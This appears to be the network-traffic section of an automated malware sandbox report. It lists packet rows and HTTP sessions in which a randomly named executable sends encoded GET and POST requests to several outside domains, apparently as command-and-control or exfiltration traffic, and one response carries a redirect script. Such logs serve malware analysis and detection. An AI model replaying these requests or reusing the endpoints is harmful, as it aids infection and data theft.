                                                                                                                                                                                Nov 29, 2024 09:17:25.872160912 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:25.872169971 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:25.872456074 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:25.872489929 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:25.872579098 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:25.872595072 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:25.872643948 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:27.058898926 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:27.059691906 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:27.059743881 CET4994780192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:27.263617039 CET4994780192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:28.282181978 CET4995280192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:28.402112007 CET8049952176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:28.402415037 CET4995280192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:28.411917925 CET4995280192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:28.531969070 CET8049952176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:29.730864048 CET8049952176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:29.730938911 CET8049952176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:29.731035948 CET4995280192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:18:22.885891914 CET5002280192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:23.154030085 CET5002280192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:23.274347067 CET8050022208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:24.173192024 CET5002380192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:24.293448925 CET8050023208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:24.293549061 CET5002380192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:24.310187101 CET5002380192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:24.430234909 CET8050023208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:25.453834057 CET8050023208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:25.453891993 CET5002380192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:25.810316086 CET5002380192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:25.930373907 CET8050023208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:26.829952002 CET5002480192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:26.950320959 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:26.950426102 CET5002480192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:26.970633030 CET5002480192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:27.091892958 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:27.091916084 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:27.091963053 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:27.092001915 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:27.092057943 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:27.092233896 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:27.092262030 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:27.092360020 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:27.092370033 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:28.109865904 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:28.111232996 CET5002480192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:28.482530117 CET5002480192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:28.602628946 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:29.500802994 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:29.621153116 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:29.621290922 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:29.630059004 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:29.750854015 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.437751055 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.437772989 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.437921047 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.437944889 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.438030958 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.438044071 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.438066959 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.438169956 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.438180923 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.438193083 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.438203096 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.438205957 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.438224077 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.438291073 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.438322067 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.557900906 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.557945967 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.558058023 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.562083006 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.630151033 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.630229950 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.630234003 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.634310961 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.634373903 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.634428978 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.642731905 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.642788887 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.642849922 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.651185036 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.651235104 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.651326895 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.659621954 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.659674883 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.659728050 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.668065071 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.668118954 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.668174028 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.676636934 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.676687002 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.676775932 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.684914112 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.684968948 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.685023069 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.693392038 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.693445921 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.693526983 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.701781988 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.701837063 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.701878071 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.750303984 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.750323057 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.750380993 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.822191000 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.822257996 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.822261095 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.824708939 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.824765921 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.824803114 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.829705954 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.829758883 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.829767942 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.834763050 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.834862947 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.837938070 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.957926035 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:37.489171982 CET5002680192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:37.609157085 CET8050026217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:37.609235048 CET5002680192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:37.625813007 CET5002680192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:37.746175051 CET8050026217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:38.930466890 CET8050026217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:38.930507898 CET8050026217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:38.930542946 CET8050026217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:38.930551052 CET5002680192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:38.930628061 CET5002680192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:39.138459921 CET5002680192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:40.159950972 CET5002780192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:40.280814886 CET8050027217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:40.287936926 CET5002780192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:40.302102089 CET5002780192.168.2.4217.160.0.200
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49741 | 23.225.159.42 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:15:52.209532976 CET | 506 | OUT | GET /8s5b/?Tr=kdnPUNSPd0&JZOtU=CIoU3XkQQhyfpcUjsw2DsPW4kkmgmyFqHE31gFJTqo9NSkmYuUT5vLSdoQQ8/MieV/ko0R3BDKl76A9J0JdcYoVtQCZc0hRmp1UzBtNRjBvgSGCiGnWKebw= HTTP/1.1
                                                                                                                                                                                Host: www.laohub10.net
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
Nov 29, 2024 09:15:53.399683952 CET | 532 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Cache-Control: max-age=86400
                                                                                                                                                                                Age: 1
                                                                                                                                                                                Connection: Close
                                                                                                                                                                                Content-Length: 357
                                                                                                                                                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49764 | 156.232.181.155 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:16:09.869949102 CET | 784 | OUT | POST /abgi/ HTTP/1.1
                                                                                                                                                                                Host: www.5tuohbpzyj9.buzz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.5tuohbpzyj9.buzz
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.5tuohbpzyj9.buzz/abgi/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=GqE9dwVezIHb5aMlYumHRNw44uZFNi2aSXfRj556l/MF0T1JJzAp2uJTHUaYBnyQWFLfELVYyRBOSMGQyxKkN+KaoUl9HVbqmNJPE1GofYHi3sDsrCP4VmeyGBCIdduPVBZ8ywacnO5YHurP8MgwXt347Gcg0nS+cph30g5+C3qTOnnX+qvtZQFyf+qYTxf/mw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49770 | 156.232.181.155 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:16:12.570077896 CET | 804 | OUT | POST /abgi/ HTTP/1.1
                                                                                                                                                                                Host: www.5tuohbpzyj9.buzz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.5tuohbpzyj9.buzz
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.5tuohbpzyj9.buzz/abgi/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=GqE9dwVezIHb568lLfmHFdw79uZFDC3RSXDRj7I9ls4F32ZJKyApleJTTEbSMHzeWFHXEJBYyVROSN2QyCSnPuKYuUl7I1bqmNJPExWCfYPiwcTsojPnYGetXBCIZduLVBZey1y6nMBYHu7Py4U/Zd3il2c+ynjGbZ95pDpvAneOCBqNvbO6LQhBC5jseyi29w9f4zJ+HGSvEzov5+ajB3I=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49775 | 156.232.181.155 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:16:15.338232040 CET | 10886 | OUT | POST /abgi/ HTTP/1.1
                                                                                                                                                                                Host: www.5tuohbpzyj9.buzz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.5tuohbpzyj9.buzz
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.5tuohbpzyj9.buzz/abgi/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
4           192.168.2.4  49786        156.232.181.155  80                1668  C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 29, 2024 09:16:18.009052992 CET  510                OUT        GET /abgi/?JZOtU=LosdeFxQ6b3v/d4RM/O2IIZZxupncQ/ZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flNvb4tlpcb0DKt+sPWXegcoTW+dqe2j7yGXM=&Tr=kdnPUNSPd0 HTTP/1.1
                                                                                                                                                                                Host: www.5tuohbpzyj9.buzz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
Nov 29, 2024 09:16:19.613151073 CET  709                IN         HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:16:19 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 566
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
5           192.168.2.4  49802        185.27.134.206   80                1668  C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 29, 2024 09:16:25.264139891 CET  796                OUT        POST /4d2l/ HTTP/1.1
                                                                                                                                                                                Host: www.canadavinreport.site
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.canadavinreport.site
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.canadavinreport.site/4d2l/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=UEpJ+8Bwbd3RRNUXihIKlmwsTpeuIwJl79M/N+4BBKL80KHTHcMp6lPFQQliFru7pwa2qgKwk3Z8ZTPf9txMYZ042OLRbUdVtXtYKbdQ7Hz8dqlLu+9q9V3luYPmeugLiiv2osQYq1NAUT0dc7lLfyagiuASlKFZH2nvluaITg5k4GUKx1v/mREJUD8ARjoA5A==
Nov 29, 2024 09:16:26.546080112 CET  683                IN         HTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:16:26 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Encoding: br


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
6           192.168.2.4  49808        185.27.134.206   80                1668  C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 29, 2024 09:16:27.933073044 CET  816                OUT        POST /4d2l/ HTTP/1.1
                                                                                                                                                                                Host: www.canadavinreport.site
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.canadavinreport.site
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.canadavinreport.site/4d2l/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=UEpJ+8Bwbd3RRpoXtgIKtmwtPZeuRgJh79A/N/NGBZv81r3TAYYpz1PFIglnBruOpwWEqh2wkzx8ZRXf+epNbp06u+LTGEdVtXtYKbJ27Hr8dZNL8qppx13ktYPmVOgPiiubooQyq2lAUSEdbqlMRCbKmuAAlacpPkWwjc6TaRt25AZQgEOo0Rg6JE10cgVJiCshOcwyVyR+Wy/Lu3yZ/CU=
Nov 29, 2024 09:16:29.258795023 CET  683                IN         HTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:16:29 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Encoding: br


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
7           192.168.2.4  49814        185.27.134.206   80                1668  C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 29, 2024 09:16:30.590215921 CET  10898              OUT        POST /4d2l/ HTTP/1.1
                                                                                                                                                                                Host: www.canadavinreport.site
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.canadavinreport.site
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.canadavinreport.site/4d2l/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
Nov 29, 2024 09:16:31.873907089 CET  683                IN         HTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:16:31 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Encoding: br


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
8           192.168.2.4  49820        185.27.134.206   80                1668  C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 29, 2024 09:16:33.240598917 CET  514                OUT        GET /4d2l/?JZOtU=ZGBp9LUVeZbORokkig5UphI/K+ukJjVB5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMMbIb+djSawZii0sFb5ZetUXWQKN4yoB6m0o=&Tr=kdnPUNSPd0 HTTP/1.1
                                                                                                                                                                                Host: www.canadavinreport.site
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
Nov 29, 2024 09:16:34.787221909 CET | 1182 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:16:34 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 981
                                                                                                                                                                                Connection: close
